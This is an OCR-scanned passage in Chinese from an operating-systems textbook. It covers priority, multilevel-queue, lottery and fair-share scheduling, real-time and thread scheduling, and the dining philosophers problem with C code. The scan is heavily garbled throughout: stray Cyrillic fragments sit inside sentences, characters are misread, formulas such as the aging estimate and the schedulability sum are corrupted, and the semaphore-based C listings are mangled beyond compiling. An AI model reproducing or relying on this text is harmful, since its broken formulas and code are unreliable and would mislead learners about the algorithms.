可 以 很 方便 地 将 一 组 进程 按 优先 级 分 成 若干 类 ， 并 


且 在 各 类 之 间 采 用 优先 级 调度 ， 而 在 各 类 进程 的 内 部 采 Юл 。 。 可 运行 进程 
用 轮转 调度 。 图 2-42 给 出 了 一 个 有 4 交 优 先 级 的 系统 , 其 Гаа H H ЕУ 
调度 算法 如 下 ， 只 要 存在 优先 级 为 第 4 类 的 可 运行 进程 ， аа] Иш 
ивтаналатават-тная, княжае Ha 
иие, зазоре, иранцев оа | КЛО | лее, 
行 第 3 类 进程 。 若 第 4 类 和 第 3 类 均 为 空 ， 则 按 轮 转 法 运行 | 优先 级 
第 2 类 进程 。 如 果 不 偶 尔 对 优先 级 进行 调整 ， 则 低 优先 级 图 2.42 有 4 个 优先 级 美的 调度 算法 
进程 很 可 能 会 产生 饥饿 现象 

3. 多 级 队列 


CTSS (Compatible TimeSharing System) ，M.LT. 在 IBM 7094 上 开发 的 兼容 分 时 系统 (Corbat6 等 人 ， 
1962)， 是 最 早 使 用 优先 级 调度 的 系统 之 一 。 但 是 在 CTSS 中 存在 进程 切换 速度 太 慢 的 问题 ， 其 原因 是 
IBM 7094 内 存 中 只 能 放 进 一 个 进程 ， 每 次 切换 都 需要 将 当前 进程 换 出 到 磁盘 ， 并 从 磁盘 上 读 入 -个 新 进 
程 。CTSS 的 设计 者 很 快 便 认识 到 ， 为 CPU 密集 型 进程 设置 较 长 的 时 间 片 比 频繁 地 分 给 它们 很 短 的 时 间 
片 要 更 为 高 效 (减少 交换 次 数 ) 。 另 一 方面 ， 如 前 所 述 ， 长 时 间 片 的 进程 又 会 影响 到 响应 时 间 ， 其 解决 
办 法 是 设立 优先 级 类 。 属 于 最 高 优先 级 类 的 进程 运行 一 个 时 间 片 ， 属于 次 高 优先 级 类 的 进程 运行 2 个 时 
间 片 ， 再 次 一 级 运行 4 个 时 间 片 ， 以 此 类 推 。 当 一 个 进程 用 完 分 配 的 时 间 片 后 ， 它 被 移 到 下 一 类 。 

作为 一 个 例子 ,考虑 有 一 个 进程 需要 连续 计算 100 个 时 间 片 。 它 最 初 被 分 配 1 个 时 间 片 ， 然后 被 换 出 。 
下 次 它 将 获得 2 个 时 间 片 ， 接 下 来 分 别 是 4、8、16、32 和 64。 当 然 最 后 一 次 它 只 使 用 64 个 时 间 片 中 的 37 
个 便 可 以 结束 工作 。 该 进程 需要 7 次 交换 (包括 最 初 的 装 入 )， 而 如 果 采 用 纯粹 的 轮转 算法 则 需要 100 次 
交换 。 而 且 ， 随 着 进程 优先 级 的 不 断 降 低 ， 它 的 运行 频 度 逐 渐 放 慢 ， 从 而 为 短 的 交互 进程 让 出 CPU 。 

对 于 那些 刚 开始 运行 一 段 长 时 间 ， 而 后 来 又 需要 交互 的 进程 ， 为 了 防止 其 永远 处 于 被 惩罚 状态 ， 可 
以 采取 下 面 的 策略 。 只 要 终端 上 有 回 车 键 (Enter 键 ) 按 下 ， 则 属于 该 终端 的 所 有 进程 就 都 被 移 到 最 高 优 
先 级 ， 这 样 做 的 原因 是 假设 此 时 进程 即将 需要 交互 。 但 可 能 有 一 天 ， 一 台 CPU 密 集 的 重 载 机 器 上 有 几 个 
用 户 偶然 发 现 ， 只 需 坐 在 那里 随机 地 每 隔 几 秒 钟 敲 一 下 回 车 键 就 可 以 大 大 提高 响应 时 间 。 于 是 他 又 告诉 
所 有 的 朋友 …… 这 个 故事 的 富 意 是 : 在 实践 上 可 行 比 理论 上 可 行 要 困难 得 多 。 

已 经 有 许多 其 他 算法 可 用 来 对 进程 划分 优先 级 类 。 例 如 ， 在 伯克利 制造 的 著名 的 XDS 940 系 统 中 
(Lampson，1968) ， 有 4 个 优先 级 类 ， 分 别 是 终端 、UO、 短 时 间 片 和 长 时 间 片 。 当 一 个 - 直 等 待 终端 输 
人 的 进程 最 终 被 唤醒 时 ， 它 被 转 到 最 高 优先 级 类 (终端 ) 。 当 等 待 磁盘 块 数据 的 一 个 进程 就 绪 时 ， 将 它 
转 到 第 2 类 。 当 进程 在 时 间 片 用 完 时 仍 为 就 结 时 ， 它 一 般 被 放 入 第 3 类 。 但 如 果 一 个 进程 已 经 多 次 用 完 时 
间 片 而 从 未 因 终端 或 其 他 UO 原 因 阻 塞 ， 那 么 它 将 被 转 入 最 低 优先 级 类 。 许多 其 他 系统 也 使 用 类 似 的 算 
法 ， 用 以 讨好 交互 用 户 和 进程 ， 而 不 惜 策 牲 后台 进 程 。 

4. 最 短 进程 优先 

对 于 批 处 理 系统 而 言 ， 由 于 最 短 作业 优先 常常 伴随 着 最 短 响应 时 间 ， 所 以 如 果 能 够 把 它 用 于 交互 进 
程 ， 那 将 是 非常 好 的 。 在 某 种 程度 上 ， 的 确 可 以 做 到 这 一 点 。 交互 进程 通常 遵循 下 列 模式 ， 等 待命 令 、 
执行 命令 等 待命 令 ， 执 行 命令 ， 如 此 不 断 反复 。 如 果 我 们 将 每 一 条 命令 的 执行 看 作 是 一 个 独立 的 “ 作 
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业 ”， 则 我 们 可 以 通过 首先 运行 最 短 的 作业 来 使 响应 时 间 最短 。 这 里 惟一 的 问题 是 如 何 从 当前 可 运行 进 
程 中 找 出 最 短 的 那 一 个 进程 。 

一 种 办 法 是 根据 进程 过 去 的 行为 进行 推测 ， 并 执行 估计 运行 时 间 最 短 的 那 一 个 。 假 设 某 个 终端 上 每 
条 命令 的 估计 运行 时 间 为 To。 现在 假设 测量 到 其 下 一 次 运行 时 间 为 Ti。 可 以 用 这 两 个 值 的 加 权 和 来 改进 
估计 时 间 ， 即 a7。+ (1-a)Ti。 通 过 选择 的 值 ， 可 以 决定 是 尽快 忘掉 老 的 运行 时 间 ， 还 是 在 一 段 长 时 间 
内 始终 记 住 它们 。 当 a = 1/2 时 ， 可 以 得 到 如 下 序列 : 

To, ТУ? + TY2, TY/4 + TVU4 + T42, Т8 + Т/8 + ТА + Ту2 
可 以 看 到 ， 在 三 轮 过 后 ，7, 在 新 的 估计 值 中 所 占 的 比重 下 降 到 1/8。 

有 时 把 这 种 通过 当前 测量 值 和 先前 估计 值 进行 加 权 平均 而 得 到 下 一 个 估计 值 的 技术 称 作 老化 
(aging) 。 它 适用 于 许多 预测 值 必 须 基于 先前 值 的 情况 。 老 化 算法 在 a = 1/2 时 特别 容易 实现 ， 只 需 将 新 值 
加 到 当前 估计 值 上 ， 然 后 除 以 2 ( 即 右 移 一 位 )。 

5. 保证 调度 

一 种 完全 不 同 的 调度 算法 是 向 用 户 作出 明确 的 性 能 保证 ， 然 后 去 实现 它 。 一 种 很 实际 并 很 容易 实现 
的 保证 是 : 若 用 户 工作 时 有 n 个 用 户 登录 ， 则 用 户 将 获得 CPU 处 理 能 力 的 1/n。 类 似 地 ， 在 一 个 有 n 个 进 
程 运 行 的 单 用 户 系统 中 ， 若 所 有 的 进程 都 等 价 ， 则 每 个 进程 将 获得 1/n 的 CPU 时 间 。 看 上 去 足够 公平 了 。 

为 了 实现 所 做 的 保证 ， 系统 必须 跟踪 各 个 进程 自 创建 以 来 已 使 用 了 多 少 CPU 时 间 。 然 后 它 计算 各 个 
进程 应 获得 的 CPU 时 间 ， 即 自 创 建 以 来 的 时 间 除 以 m。 由 于 各 个 进程 实际 获得 的 CPU 时 间 是 已 知 的 ， 所 
以 很 容易 计算 出 真正 获得 的 CPU 时 间 和 应 获得 的 CPU 时 间 之 比 。 比率 为 0.5 说 明 一 个 进程 只 获得 了 应 得 时 
间 的 一 半 ， 而 比率 为 2.0 则 说 明 它 获得 了 应 得 时 间 的 2 倍 。 于 是 该 算法 随后 转向 比率 最 低 的 进程 ， 直 到 该 
进程 的 比率 超过 它 的 最 接近 竞争 者 为 止 。 

6. 彩票 调度 

给 用 户 一 个 保证 ， 然 后 兑现 之 ， 这 是 个 好 想法 ， 不 过 很 难 实现 。 但 是 ， 有 一 个 既 可 给 出 类 似 预测 结 
果 而 又 有 非常 简单 的 实现 方法 的 算法 ， 这 个 算法 称 为 彩票 调度 (lottery scheduling) (Waldspurger 和 
Weihl, 1994), 

其 基本 思想 是 向 进程 提供 各 种 系统 资源 (如 CPU 时 间 ) 的 彩票 。 - 旦 需要 做 出 一 项 调度 决策 时 ， 就 
随机 抽出 一 张 彩票 ， 拥 有 该 彩 票 的 进程 获得 该 资源 。 在 应 用 到 CPU 调 度 时 ， 系 统 可 以 掌 担 每 秒 钟 50 次 的 
一 种 彩票 ， 作 为 奖励 每 个 获奖 者 可 以 得 到 20ms 的 CPU 时 间 。 

为 了 说 明 George Orwell 关 于 “所 有 进程 是 平等 的 ， 但 是 某 些 进程 更 平等 一 些 ”的 含义 ， 可 以 给 更 重 
要 的 进程 额外 的 彩票 ， 以 便 增 加 它们 获胜 的 机 会 。 如 果 出 售 了 100 张 彩票 ， 而 有 一 个 进程 持 有 其 中 的 20 
张 ， 那 么 在 每 一 次 抽奖 中 该 进程 就 有 20% 的 取胜 机 会 。 在 较 长 的 运行 中 ， 该 进程 会 得 到 20% 的 CPU。 相 
反 ， 对 于 优先 级 调度 程序 ， 很 难说 明 拥有 优先 级 40 究 况 是 什么 意思 ， 而 这 里 的 规则 很 清楚 : 拥有 彩票 / 
份额 的 进程 大 约 得 到 系统 资源 的 /份额 。 

彩票 调度 具有 若干 有 趣 的 性 质 。 例 如 ， 如 果 有 一 个 新 的 进程 出 现 并 得 到 一 些 彩票 ， 那 么 在 下 一 次 的 
抽奖 中 ， 该 进程 会 有 同 它 持 有 彩票 数量 成 比例 的 机 会 赢得 奖励 。 换 句 话说 ， 彩 票 调度 是 反应 迅速 的 。 

如 果 希 望 协 作 进程 可 以 交换 它们 的 彩票 。 例 如 ， 有 一 个 客户 进程 向 服务 器 进程 发 送 消息 后 就 被 阻塞 ， 
该 客户 进程 可 以 把 它 所 有 的 彩票 交 给 服务 器 ， 以 便 增加 该 服务 器 下 次 运行 的 机 会 。 在 服务 器 运行 完成 之 
后 ， 该 服务 器 再 把 彩票 还 给 客户 机 ， 这 样 客户 机 又 可 以 运行 了 。 事 实 上 ， 如 果 没 有 客户 机 ， 服 务 器 根本 
就 不 需要 彩票 。 

彩票 调度 可 以 用 来 解决 用 其 他 方法 很 难 解决 的 问题 。 一 个 例子 是 ， 有 一 个 视频 服务 器 ， 在 该 视频 服 
务 器 上 若干 进程 正在 向 其 客户 提供 视频 流 ， 每 个 视频 流 的 帧 速率 都 不 相同 。 假设 这 些 进程 需要 的 帧 速率 
分 别 是 10、20 和 25 帧 / 秒 。 如 果 给 这 些 进程 分 别 分 配 10、 20 和 25 张 彩票 ， 那 么 它们 会 自动 地 按照 大 致 正 
确 的 比例 ( 即 10 : 20: 25) 划分 CPU 的 使 用 。 

7. 公平 分 享 调度 

到 现在 为 止 ， 我 们 假设 被 调度 的 都 是 各 个 进程 自身 ， 并 不 关注 其 所 有 者 是 谁 。 这 样 做 的 结果 是 ， 如 
果 用 户 1 启动 9 个 进程 而 用 户 2 启动 1 个 进程 ， 使 用 轮转 或 相同 优先 级 调度 算法 ， 那 么 用 户 1 将 得 到 90% 的 
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CPU 时 间 ， 而 用 户 2 只 得 到 10% 的 CPU 时 间 。 
为 了 避免 这 种 情形 ， 某 些 系统 在 调度 处 理 之 前 考虑 谁 拥有 进程 这 一 因素 。 在 这 种 模式 中 ， 每 个 用 户 
分 配 到 CPU 时 间 的 一 部 分 ， 而 调度 程序 以 一 种 强制 的 方式 选择 进程 。 这 样 ， 如 果 两 个 用 户 都 得 到 获得 
50% CPU 时 间 的 保证 ， 那 么 无 论 一 个 用 户 有 多 少 进程 存在 ， 每 个 用 户 都 会 得 到 应 有 的 CPU 份额 。 
作为 一 个 例子 ， 考 虑 有 两 个 用 户 的 一 个 系统 ， 每 个 用 户 都 保证 获得 50% CPU 时 间 。 用 户 1 有 4 个 进程 
A、B、C 和 D， 而 用 户 2 只 有 1 个 进程 E。 如 果 采 用 轮转 调度 ， 一 个 满足 所 有 限制 条 件 的 可 能 序列 是 ， 
AEBECEDEAEBECEDE… 
另 一 方面 ， 如 果 用 户 1 得 到 比 用 户 2 两 倍 的 CPU 时 间 ， 我 们 会 有 
ABECDEABECDE… 
当然 ， 大 量 其 他 的 可 能 也 存在 ， 可 以 进一步 探讨 ， 这 取决 于 如 何 定义 公平 的 含义 。 


2.4.4 实时 系统 中 的 调度 

实时 系统 是 一 种 时 间 起 着 主导 作用 的 系统 。 典 型 地 ， 外 部 的 一 种 或 多 种 物理 设备 给 了 计算 机 一 个 刺 
激 ， 而 计算 机 必须 在 一 个 确定 的 时 间 范 围 内 恰当 地 做 出 反应 。 例 如 ， 在 CD 播放 器 中 的 计算 机 获得 从 驱动 
器 而 来 的 位 流 ， 然 后 必须 在 非常 短 的 时 间 间 隔 内 将 位 流转 换 为 音乐 。 如 果 计算 时 间 过 长 ， 那 么 音乐 就 会 
听 起 来 有 异常 。 其 他 的 实时 系统 例子 还 有 ， 医 院 特别 护理 部 门 的 病人 监护 装置 、 飞 机 中 的 自动 驾驶 系统 
ЖН ИЕТ PRIMEA, {ЕРТЕ Ж ВДИ, ТЕБИНИН ЕН ЭЙЕ ЖЕКЕНИ Н БЕН, 

实时 系统 通常 可 以 分 为 硬 实 时 (hard real time) 和 软 实时 (soft real time)， 前 者 的 含义 是 必须 满足 
绝对 的 截止 时 间 ， 后 者 的 含义 是 虽然 不 希望 偶尔 错失 截止 时 间 ， 但 是 可 以 容忍 。 在 这 两 种 情形 中 ， 实 时 
性 能 都 是 通过 把 程序 划分 为 一 组 进程 而 实现 的 ， 其 中 每 个 进程 的 行为 是 可 预测 和 提前 掌握 的 。 这 些 进程 
一 般 寿 命 较 短 ， 并 且 极 快 地 就 运行 完成 。 在 检测 到 一 个 外 部 信号 时 ， 调 度 程序 的 任务 就 是 按照 满足 所 有 
截止 时 间 的 要 求 调 度 进程 。 

实时 系统 中 的 事件 可 以 按照 响应 方式 进一步 分 类 为 周期 性 〈 以 规则 的 时 间 间隔 发 生 ) 事件 或 非 周期 
性 (发 生 时 间 不 可 预知 ) 事件 。 一 个 系统 可 能 要 响应 多 个 周期 性 事件 流 。 根 据 每 个 事件 需要 处 理 时 间 的 
长 短 ， 系 统 其 至 有 可 能 无 法 处 理 完 所 有 的 事件 。 例 如 ， 如 果 有 m 个 周期 事件 ， 事 件 i 以 周期 P 发 生 ， 并 需 
要 C 秒 CPU 时 间 处 理 一 个 事件 ， 那 么 可 以 处 理 负载 的 条 件 是 
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满足 这 个 条 件 的 实时 系统 称 为 是 可 调度 的 。 

作为 一 个 例子 ， 考 虑 一 个 有 三 个 周期 性 事件 的 软 实时 系统 ， 其 周期 分 别 是 100ms、 200ms 和 500ms。 
如 果 这 些 事件 分 别 需要 50ms、30ms 和 100 ms 的 CPU 时 间 , 那么 该 系统 是 可 调度 的 , 因为 0.5 +015 +0.2 < 1, 
如 果 有 第 四 个 事件 加 入 ， 其 周期 为 1 秒 ， 那 么 只 要 这 个 事件 是 不 超过 每 事件 150ms 的 CPU 时 间 ， 那 么 该 系 
统 就 仍然 是 可 调度 的 。 在 这 个 计算 中 隐 含 了 一 个 假设 ， 即 上 下 文 切换 的 开销 很 小 ， 可 以 忽略 不 计 。 

实时 系统 的 调度 算法 可 以 是 静态 或 动态 的 。 前 者 在 系统 开始 运行 之 前 作出 调度 决策 ， 后 者 在 运行 过 
程 中 进行 调度 决策 。 只 有 在 可 以 提前 掌握 所 完成 的 工作 以 及 必须 满足 的 截止 时 间 等 全 部 信息 时 ， 静态 调 
度 才 能 工作 。 而 动态 调度 算法 不 需要 这 些 限制 。 这 里 我 们 只 涉及 一 些 特定 的 算法 ， 而 把 实时 多 媒体 系统 
留 到 第 7 章 去 讨论 。 
2.4.5 策略 和 机 制 

到 目前 为 止 ， 我 们 隐 含 地 假设 系统 中 所 有 进程 分 属 不 同 的 用 户 ， 并 且 ， 进 程 间 相 互 竞争 CPU。 通 常 
情况 下 确实 如 此 ， 但 有 时 也 有 这 样 的 情况 : 一 个 进程 有 许多 子 进程 并 在 其 控制 下 运行 。 例 如 ， 一 个 数据 
库 管理 系统 可 能 有 许多 子 进程 ， 每 一 个 子 进程 可 能 处 理 不 同 的 请 求 ， 或 每 一 个 子 进程 实现 不 同 的 功能 
(如 请 求 分 析 ， 磁 盘 访问 等 )。 主 进程 完全 可 能 掌 担 哪 一 个 子 进程 最 重要 (或 最 紧迫 ) 而 哪 一 个 最 不 重要 。 
但 是 ， 以 上 讨论 的 调度 算法 中 没有 一 个 算法 从 用 户 进程 接收 有 关 的 调度 决策 信息 ， 这 就 导致 了 调度 程序 
很 少 能 够 做 出 最 优 的 选择 。 

解决 问题 的 方法 是 将 调度 机 制 (scheduling mechanism) 与 调度 策略 (scheduling policy) 分 离 (4 
名 的 原则 ，Levin 等 人 ，1975)， 也 就 是 将 调度 算法 以 某 种 形式 参数 化 ， 而 参数 可 以 由 用 户 进程 填写 。 我 
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们 再 来 看 一 下 数据 库 的 例子 。 假 设 内 核 使 用 优先 级 调度 算法 ， 但 提供 一 条 可 供 进程 设置 (并 改变 ) 优先 
级 的 系统 调用 。 这 样 ， 尽 管 父 进程 本 身 并 不 参与 调度 ， 但 它 可 以 控制 如 何 调度 子 进程 的 细节 。 在 这 里 ， 
调度 机 制 位 于 内 核 ， 而 调度 策略 则 由 用 户 进程 决定 。 

246 线程 调度 

当 若干 进程 都 有 多 个 线程 时 ， 就 存在 两 个 层次 的 并 行进 程 和 线程 。 在 这 样 的 系统 中 调度 处 理 有 本 
质 差别 ， 这 取决 于 所 支持 的 是 用 户 级 线程 还 是 内 核 级 线程 (或 两 者 都 支持 )。 

首先 考虑 用 户 级 线程 。 由 于 内 核 并 不 知道 有 线程 存在 ， 所 以 内 核 还 是 和 以 前 一 样 地 操作 ， 选 取 一 个 
进程 ， 假 设 为 A， 并 给 予 A 以 时 间 片 控制 。A 中 的 线程 调度 程序 决定 哪个 线程 运行 ， 假 设 为 A1。 由 于 多 
道 线程 并 不 存在 时 钟 中 断 ， 所 以 这 个 线程 可 以 按 其 意愿 任意 运行 多 长 时 间 。 如 果 该 线程 用 完了 进程 的 全 
部 时 间 片 ， 内 核 就 会 选择 另 一 个 进程 运行 。 

在 进程 A 终 于 又 一 次 运行 时 ， 线 程 Al 会 接着 运行 。 该 线程 会 继续 耗费 A 进 程 的 所 有 时 间 ， 直 到 它 完 
成 工作 。 不 过 ， 该 线程 的 这 种 不 合群 的 行为 不 会 影响 到 其 他 的 进程 。 其 他 进程 会 得 到 调度 程序 所 分 配 的 
合适 份额 ， 不 会 考虑 进程 A 内 部 所 发 生 的 事 。 

现在 考虑 A 线 程 每 次 CPU 计算 的 工作 比较 少 的 情况 ， 例 如 ， 在 50ms 的 时 间 片 中 有 5ms 的 计算 工作 。 
于 是 ， 每 个 线程 运行 一 会 儿 ， 然 后 把 CPU 交 回 给 线程 调度 程序 。 这 样 在 内 核 切 换 到 进程 B 之 前 ， 就 会 有 
序列 A1，A2，A3，Al， A2, A3, Al, A2, A3, Al, 这 种 情形 可 用 图 2-43a 表 示 。 


进程 A 进程 B 进程 A 进程 B 


2. 运行 时 系统 先 
取 一 个 线程 
上 内核 选 取 一 个 进 各 1 .内核 选取 一 个 线程 В 
可 能 ; А1, А2, АЗ, A1, А2, АЗ 可 能 : А1, А2, АЗ, А1, А2, АЗ 
不 可 能 ， А1, ВІ, А2, B2, АЗ, ВЗ 也 可 能 : A1, B1, А2, B2, АЗ, ВЗ 


а b) 


图 2-43 a) 用 户 级 线程 的 可 能 调度 ， 有 50ms 时 间 片 的 进程 以 及 每 次 运行 
Sms CPU 的 线程 ，b) а) 有 相同 特性 的 内 核 级 线程 的 可 能 调度 


实时 系统 使 用 的 调度 算法 可 以 是 上 面 介绍 的 算法 中 的 任意 一 种 。 从 实用 考虑 ， 轮 转调 度 和 优先 级 调 
度 更 为 常用 。 惟 一 的 局 限 是 ， 缺乏 一 个 时 钟 将 运行 过 长 的 线程 加 以 中 断 。 

现在 考虑 使 用 内 核 级 线程 的 情形 。 内 核 选择 一 个 特定 的 线程 运行 。 它 不 用 考虑 该 线程 属于 哪个 进程， 
不 过 如 果 有 必要 的 话 ， 它 可 以 这 样 做 。 对 被 选择 的 线程 赋予 一 个 时 间 片 ， 而 且 如 果 超 过 了 时 间 片 ， 就 会 
强制 挂 起 该 线程 。 一 个 线程 在 50ms 的 时 间 片 内 ，5ms 之 后 被 阻塞 ， 在 30ms 的 时 间 段 中 ， 线 程 的 顺序 会 是 
Al，B1，A2，B2，A3，B3， 在 这 种 参数 和 用 户 线程 状态 下 ， 有 些 情形 是 不 可 能 出 现 的 。 这 种 情形 部 分 
通过 图 2-43b 刻 画 。 

用 户 级 线程 和 内 核 级 线程 之 间 的 差别 在 于 性 能 。 用 户 级 线程 的 线程 切换 需要 少量 的 机 器 指令 ， 而 内 
核 级 线程 需要 完整 的 上 下 文 切换 ， 修 改 内 存 映 像 ， 使 高 速 缓存 失效 ， 这 导致 了 若干 数量 级 的 延迟 。 另 一 
方面 ， 在 使 用 内 核 级 线程 和 对， 一旦 线程 阻 塞 在 /O 上 就 不 需要 像 在 户 级 线程 中 那样 将 整个 进程 挂 起 。 

从 进程 A 的 一 个 线程 切换 到 进程 B 的 一 个 线程 ， 共 代价 高 于 运 了 进程 A 的 第 2 个 线程 (因为 必须 修改 
内 存 喘 像 ， 清 除 内 存 高 速 缓存 的 内 容 ) ， 内 核对 此 是 了 解 的 ， 并 可 运用 这 些 信息 做 出 决定 。 例 如 ， 给 定 
两 个 在 其 他 方面 同等 重要 的 线程 ， 其 中 一 个 线程 与 刚好 阻塞 的 线程 属于 同一 个 进程 ， 而 另 一 个 线程 属于 
其 他 的 进程 ， 那 么 应 该 倾向 前 者 。 
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另 一 个 重要 因素 是 用 户 级 线程 可 以 使 用 专 为 应 用 程序 定制 的 线程 调度 程序 。 例 如 ， 考 虑 图 2-8 中 的 
Web 服 务 器 。 假 设 一 个 工作 线程 刚刚 被 阻塞 ， 而 分 派 线程 和 另外 两 个 工作 线程 是 就 绪 的 。 那 么 应 该 运行 
哪 一 个 呢 ?” 由 于 运行 系统 了 解 所 有 线程 的 作用 ， 所 以 会 直接 选择 分 派 线程 接着 运行 ， 这 样 分 派 线程 就 会 
启动 另 一 个 工作 线程 运行 。 在 一 个 工作 线程 经 常 阻 塞 在 磁盘 UO 上 的 环境 中 ， 这 个 策略 将 并 行 度 最 大 化 。 
而 在 内 核 级 线程 中 ， 内 核 从 来 不 了 解 每 个 线程 的 作用 (虽然 它们 被 赋予 了 不 同 的 优先 级 )。 不 过 ， 一 般 
而 言 ， 应 用 定制 的 线程 调度 程序 能 够 比 内 核 更 好 地 满足 应 用 的 需要 。 


2.5 经 典 的 IPC 问 题 
操作 系统 文献 中 有 许多 广 为 讨 论 和 分 析 的 有 趣 问题 ， 它 们 与 同步 方法 的 使 用 相关 。 以 下 儿 节 我 们 将 
讨论 其 中 两 个 最 著名 的 问题 。 


2.5.1 哲学 家 就 餐 问题 

1965 年 ，Dijkstra 提 出 并 解决 了 一 个 他 称 之 为 上 学 家 就 葵 的 同步 问题 。 从 那 时 起 ， 每 个 发 明 新 的 同 
步 原 语 的 人 都 希望 通过 解决 哲学 家 就 餐 问题 来 展示 其 同步 
原 语 的 精妙 之 处 。 这 个 问题 可 以 简单 地 描述 如 下 : 五 个 哲 
学 家 围 坐 在 一 张 圆桌 周围 ， 每 个 哲学 家 面前 都 有 一 盘 通 心 
粉 。 由 于 通 心 粉 很 滑 ， 所 以 需要 两 把 叉子 才能 夹 住 。 相 邻 
两 个 盘子 之 间 放 有 一 把 又 子 ， 餐 桌 如 图 2-44 所 示 。 

哲学 家 的 生活 中 有 两 种 交替 活动 时 段 ， 即 吃饭 和 思考 
(这 只 是 一 种 抽象 ， 即 对 哲学 家 而 言 其 他 活动 都 无 关 紧 要 )。 
当 一 个 哲学 家 觉得 俄 了 时 ， 他 就 试图 分 两 次 去 取 其 左边 和 
右边 的 又 子 ， 每 次 拿 一 把 ， 但 不 分 次 序 。 如 果 成 功 地 得 到 
了 两 把 叉子， 就 开始 吃饭 ， 吃 完 后 放下 又 子 继续 思考 。 关 
键 问 题 是， 能 为 每 一 个 哲学 家 写 一 段 描述 其 行为 的 程序 
且 决 不 会 死 锁 吗 ? (要 求 拿 两 把 叉子 是 人 为 规定 的 ， 我 们 
也 可 以 将 意大利 面条 换 成 中 国 菜 ， 用 米饭 代替 通 心 扮 ， 用 
筷子 代替 叉子。) 图 2-44 哲学 家 的 午餐 时 间 

图 2-45 给 出 了 一 种 直观 的 解法 。 过 程 take_fork 将 一 直 
等 到 所 指定 的 又 子 可 用 ， 然 后 将 其 取 用 。 不 过 ， 这 种 显然 的 解法 是 错误 的 。 如 果 五 位 哲学 家 同时 拿 起 左 
面 的 叉子， 就 没有 人 能 够 拿 到 他 们 右面 的 叉子， 于 是 发 生死 锁 。 

我 们 可 以 将 这 个 程序 修改 一 下 ， 这 样 在 拿 到 左 又 后 ， 程 序 要 查看 右面 的 又 子 是 否 可 用 。 如 果 不 可 用 
则 该 哲学 家 先 放下 左 又， 等 一 段 时 间 ， 再 重复 整个 过 程 。 但 这 种 解法 也 是 错误 的 ， 尽 管 与 前 一 种 原因 不 同 。 
可 能 在 某 一 个 瞬间 ， 所 有 的 哲学 家 都 同时 开始 这 个 算法 ， 拿 起 其 左 又 ， 看 到 右 叉 不 可 用 ， 又 都 放下 左 又 
等 一 会 儿 ， 又 同时 拿 起 左 又 ， 如 此 这 样 永远 重复 下 去 。 对 于 这 种 情况 ， 所 有 的 程序 都 在 不 停 地 运行 ， 但 都 
无 法 取得 进展 ， 就 称 为 负 蚀 (starvation)。( 即 使 问题 不 发 生 在 意大利 餐馆 或 中 国 餐 馆 ， 也 被 称 为 饥饿 。) 


#define N 5 * 哲学 家 的 数目 * 
void philosopher(int i) ti 哲学 家 编号 ， 从 0 到 4 */ 
hile (TRUE 
Е па * 哲学 家 在 思考 */ 
take_fork(i); * 拿 起 左边 叉子 */ 
take_fork((i+1) % N); * 拿 起 右边 又 子 ，% 是 模 运 算 */ 
eat( ); tR */ 
put_fork(i) (е 将 左 叉 放 回 抹 上 */ 
) put-fork((+1) % М); * # ОКЕ Е */ 
1 


图 2-45 哲学 家 就 餐 问题 的 一 种 错误 解法 
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现在 读者 可 能 会 想 ,“ 如 果 和 哲学 家 在 拿 不 到 右边 又 子 时 等 待 一 段 随机 时 间 ， 而 不 是 等 待 相同 的 时 间 ， 这 样 
发 生 互 锁 的 可 能 性 就 很 修了， 事情 就 可 以 继续 了 .” 这 种 想法 是 对 的 ， 而 且 在 几乎 所 有 的 应 用 程序 中 ， 稍 后 再 
试 的 办 法 并 不 会 演化 成 为 一 个 问题 。 例 如 ， 在 流行 的 局 域 网 以 太 网 中 ， 如 果 两 台 计算 机 同时 发 送 包 ， 那么 每 台 
计算 机 等 待 一 段 随机 时 间 之 后 再 尝试 。 在 实践 中 ， 访 方案 工作 良好 。 但 是 ， 在 少数 的 应 用 中 ， 人 们 希望 有 一 种 
能 够 始终 工作 的 方案 ， 它 不 能 因为 一 品 不 可 靠 的 随机 数字 而 导致 失败 (想象 一 下 核电 站 中 的 安全 控制 系统 )。 

对 图 2-45 中 的 算法 可 做 如 下 改进 ， 它 既 不 会 发 生死 锁 又 不 会 产生 饥饿 ， 使 用 一 个 二 元 信号 量 对 调用 
think 之 后 的 五 个 语句 进行 保护 。 在 开始 拿 叉 子 之 前 ， 哲 学 家 先 对 互 斥 量 mutex 执 行 down 操 作 。 在 放 回 
叉子 后 ， 他 再 对 mutex 执 行 up 操作 。 从 理论 上 讲 ， 这 种 解法 是 可 行 的 。 但 从 实际 角度 来 看 ， 这 里 有 性 能 
上 的 局 限 : 在 任何 一 时 刻 只 能 有 一 位 哲学 家 进餐 。 而 五 把 叉子 实际 上 可 以 允许 两 位 哲学 家 同时 进餐 。 

图 2-46 中 的 解法 不 仅 没有 死 锁 ， 而 且 对 于 任意 位 哲学 家 的 情况 都 能 获得 最 大 的 并 行 度 。 算 法 中 使 用 
一 个 数组 state 跟 踪 每 一 个 哲学 家 是 在 进餐 、 思 考 还 是 饥饿 状态 (正在 试图 拿 叉 子 ) 。 一 个 哲学 家 只 有 在 
两 个 邻居 都 没有 进餐 时 才 允 许 进 入 到 进餐 状态 。 第 个 哲学 家 的 邻居 则 由 宏 LEFT 和 RIGHT 定 义 , 换言之 ， 
车 为 2， 则 LEFT 为 1，RIGHT 为 3。 


#дейпе М 5 依 哲 学 家 数目 */ 
#define LEFT (+N-1)56N 人 #i 的 左 邻居 编号 */ 
#define RIGHT (+1)%N 人 并 的 右 邻居 编号 */ 
#define THINKING 0 局 哲学 家 在 思考 */ 
#define HUNGRY 1 /* 哲学 家 试图 拿 起 叉子 */ 
#define EATING 2 т ИИ РЕР 
typedef int semaphore; r 5 ч з! * 
int state[N]; 1* 数组 用 来 跟踪 记录 每 位 哲学 家 的 状态 */ 
semaphore mutex = 1; ї* 临界 区 的 互 奈 */ 
semaphore s[N]; 八 每 个 哲学 家 一 个 信号 量 */ 
void philosopher(int i) i: 哲学 家 编号 ， 从 0 到 N 一 1 */ 
{ 
while (TRUE) { 个 无 限 循环 */ 
) } 
void take_forks(int i) [i 哲学 家 编号 ， 从 0 到 N 一 1 */ 
Я r 
down(&mutex); 个 进入 临界 区 */ 
Ft = vr I 记录 哲学 家 i 处 于 饥饿 的 状态 */ 
test(i); /* 尝试 获取 2 把 又 子 */ 
up(&mutex); 任 离 开 临 界 区 "/ 
down(&s[]); P 如 果 得 不 到 需要 的 又 子 则 限 塞 */ 
} 
void put_forks() і. 哲学 家 编号 ， 从 0 到 N 一 1 */ 
{ 
down(&mutex); 局 进 入 临界 区 */ 
